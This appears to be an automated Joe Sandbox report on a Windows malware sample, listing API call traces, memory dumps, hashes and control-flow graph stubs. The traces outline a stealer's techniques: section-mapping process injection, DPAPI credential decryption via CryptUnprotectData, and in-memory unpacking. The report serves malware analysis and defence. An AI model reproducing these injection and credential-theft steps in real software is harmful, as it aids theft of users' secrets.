                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                            • Instruction ID: aa686160c5e479dc60cd3c6abf7d34016e244b0820b9c6a6449991f1b23776f6
                                                            • Opcode Fuzzy Hash: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                            • Instruction Fuzzy Hash: F1513BB1900209BFEB208F91CC48FAFBBB8FF85B10F140129F911BA2E5D6759945CB24

                                                            Control-flow Graph

                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                            • Instruction ID: 248f23169df6d57de1173162bb8fcbefd5e68f0f1e7bb912041edb2cf68793e3
                                                            • Opcode Fuzzy Hash: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                            • Instruction Fuzzy Hash: 11512AB0900245BFEB208F91CC48FAFBBB8FF85B00F14016AF911BA2E5D6759941CB24

                                                            Control-flow Graph

                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0

                                                            Control-flow Graph (first node: 401a01-401a02)
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0

                                                            Control-flow Graph (first node: 4019e3-4019fc)
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0

                                                            Control-flow Graph (first node: 4019ee-4019f6)
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0

                                                            Control-flow Graph (first node: 4019fa-4019fc)
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0

                                                            Control-flow Graph (first node: 401a09-401a48)
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0

                                                            Control-flow Graph (first node: 401a10-401a48)
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                              • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0

                                                            Execution Graph

                                                            Execution Coverage:8.2%
                                                            Dynamic/Decrypted Code Coverage:33.8%
                                                            Signature Coverage:11.1%
                                                            Total number of Nodes:314
                                                            Total number of Limit Nodes:12
calls 21398->21399 21400 41a859 21399->21400 21401 4372f8 21402 437380 RtlAllocateHeap 21401->21402 21403 437348 21401->21403 21404 4373a0 21402->21404 21403->21402 21405 4337fd 21408 439500 21405->21408 21407 43382b GetVolumeInformationW 21512 43793d 21513 437982 21512->21513 21515 4379ee 21513->21515 21516 4373e0 LdrInitializeThunk 21513->21516 21516->21515 21409 41537e 21410 415388 21409->21410 21411 435440 RtlAllocateHeap 21410->21411 21413 4154e8 21411->21413 21412 415635 CryptUnprotectData 21413->21412

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                                                            • String ID:
                                                            • API String ID: 1449868515-3916222277
                                                            • Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                            • Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
                                                            • Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                            • Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2PBb$Yceh$]hW9
                                                            • API String ID: 0-1551782443
                                                            • Opcode ID: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                            • Instruction ID: 0399154fc7d8c55f12102b5960697b3d06da357f666e701177502f53bd351286
                                                            • Opcode Fuzzy Hash: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                            • Instruction Fuzzy Hash: B7926C70208B908EE726CF35C4A07E7BBE1BF16305F44499DD1EB8B282DB796509CB55

                                                            Control-flow Graph

                                                            • control_flow_graph for the function at 41fd10 (rendered graph omitted)
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb$gdeb$rr$}x$a_
                                                            • API String ID: 0-3617765606
                                                            • Opcode ID: ece44b61750e77531050f751d2c714b5c3d0fc1077405b2ce026a3a9abb68388
                                                            • Instruction ID: 6e898c47a17abb5f03504fba61c95c3f7ffb61a8dca5b2db11db91053f235b82
                                                            • Opcode Fuzzy Hash: ece44b61750e77531050f751d2c714b5c3d0fc1077405b2ce026a3a9abb68388
                                                            • Instruction Fuzzy Hash: 4E2278B4108381DFE320CF24D895B6BBBE0FB86308F54892DE5D99B262D7399505CF96

                                                            Control-flow Graph

                                                            • control_flow_graph for the function at 409960 (rendered graph omitted)
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0$01$ZR\;$[hct${hmn
                                                            • API String ID: 0-1484469362
                                                            • Opcode ID: 9addd3b863d326590257d70592a47e247d8e9e76fabce0ec909f09bc427e5ad8
                                                            • Instruction ID: 48ecf83dcb48e748d01dfa638aea1d50d8185787a1297f3da60f3c5648012799
                                                            • Opcode Fuzzy Hash: 9addd3b863d326590257d70592a47e247d8e9e76fabce0ec909f09bc427e5ad8
                                                            • Instruction Fuzzy Hash: 971202B02083818BE724CF15C4A476FBBE1BBC6348F144D2DE5D58B292D77AD809CB96
                                                            APIs
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041564F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: CryptDataUnprotect
                                                            • String ID: .$=
                                                            • API String ID: 834300711-1678909263
                                                            • Opcode ID: 183ef4c1313d8aee56ada1eed8e8f16050662da6e108a753712437f4e389a81a
                                                            • Instruction ID: 1ba618c7c74fca3a6dab2d59277d8eb37d046adcbf7b7a58cf2c090dca870eab
                                                            • Opcode Fuzzy Hash: 183ef4c1313d8aee56ada1eed8e8f16050662da6e108a753712437f4e389a81a
                                                            • Instruction Fuzzy Hash: 9481D5B1508740CFD724CF29C49179BBBE2AFD6308F184A2EE1A58B392D739D945CB46
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007BE7B6
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 007BE7D6
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7bd000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: e77da6e9868a3ea2bbb6b69702ad2be4833759a85dd3d186b2deded3b27b49b9
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: 4EF09631200710ABE7203BF5AC8DBEE76ECEF49724F100529F642912C0DF74EC454A61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: )$IEND
                                                            • API String ID: 0-707183367
                                                            • Opcode ID: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
                                                            • Instruction ID: 05b6572399bca2268092eb3df2821dc4a125dc7a7576062249b5a2d5c26daba1
                                                            • Opcode Fuzzy Hash: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
                                                            • Instruction Fuzzy Hash: 4CE1B1B2A083449BD714CF28D88175B7BE5ABD4314F14853EFA95AB3C1D778E904CB8A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: ]hiX$gdeb
                                                            • API String ID: 2994545307-4273025081
                                                            • Opcode ID: 7fbaa0d25f5ecf0750f065394b18b78656d35acff2d5509d26a22e1454e3b5db
                                                            • Instruction ID: 336b67656a256fc3d7c49e2fee8c29aa2d9fc5d5d61a2c4a19b8c8911d00a2fb
                                                            • Opcode Fuzzy Hash: 7fbaa0d25f5ecf0750f065394b18b78656d35acff2d5509d26a22e1454e3b5db
                                                            • Instruction Fuzzy Hash: B6C1E3B17083118FD714CF15D89172BBBE1EBD5318FA48A2EE4959B382D738D845CB8A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: IO
                                                            • API String ID: 0-3981347273
                                                            • Opcode ID: 29fb27968318ae9cb900c6618a64d07fe03029c203b194ad627e1d93fc6363e6
                                                            • Instruction ID: 51fd4917a3c3351c2bbf2a3dc6b6b13a62bcc2487d4881d1c48f1649ea521d72
                                                            • Opcode Fuzzy Hash: 29fb27968318ae9cb900c6618a64d07fe03029c203b194ad627e1d93fc6363e6
                                                            • Instruction Fuzzy Hash: 94D132B1200B018BD724CF15C590B52BBF2FF4A704F158A9DD89A8FB56D739E985CB88
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a5d886a9cf1d364aeba75cbb5fbc2a0112e377b092f9423ae5a3a5703b18e045
                                                            • Instruction ID: 02b8bb6e56041378f4f9f2711353cce18edc58b923ed8b10765db063976cd2a1
                                                            • Opcode Fuzzy Hash: a5d886a9cf1d364aeba75cbb5fbc2a0112e377b092f9423ae5a3a5703b18e045
                                                            • Instruction Fuzzy Hash: EA41BD745083528BC724CF14C8617ABB7E1FF89358F054A1DE9DA9B381E7389985CB8A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                            • Instruction ID: 151cf318142fe4857ebf8dfdf36c3425f9736b69a2a980a3f824acb8caea4c7c
                                                            • Opcode Fuzzy Hash: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                            • Instruction Fuzzy Hash: 36F039B45093418FC320EF25D55474ABBE1ABD8304F01882DE489C7391DBB99858CF86

                                                            Control-flow Graph

                                                            • control_flow_graph for the function at 214003c; API calls named in the graph: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA (rendered graph omitted)
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0214024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: 48cea063c97ef949dd5434e3ad27270cf03c1d81571c479ac5389c31e4d80e02
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: 52527974A01229DFDB64CF59C984BACBBB1BF09304F1580E9E94DAB351DB30AA85DF14

                                                            Control-flow Graph

                                                            • control_flow_graph for the function at 41cfa0; API calls named in the graph: RtlExpandEnvironmentStrings (rendered graph omitted)
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D0A0
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D0CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: K-K/$U5U7$\1B3
                                                            • API String ID: 237503144-1235027928

                                                            Control-flow Graph
                                                            • Graph not preserved; first block 41d8e0-41d993, API calls shown: RtlExpandEnvironmentStrings
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041DA0A
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041DA3A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: eI.K$qs
                                                            • API String ID: 237503144-3936219367

                                                            Control-flow Graph
                                                            • Graph not preserved; first block 408ea0-408ead, API calls shown: GetStdHandle, GetConsoleWindow, ExitProcess
                                                            APIs
                                                            Strings
                                                            • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 00408EDE
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                            • API String ID: 621844428-2804141084

                                                            Control-flow Graph
                                                            • Graph not preserved; first block 4337fd-43385d, API calls shown: GetVolumeInformationW
                                                            APIs
                                                            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00433840
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: InformationVolume
                                                            • String ID: :$C$\
                                                            • API String ID: 2039140958-3809124531
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocString
                                                            • String ID: *$,
                                                            • API String ID: 2525500382-162240353
                                                            APIs
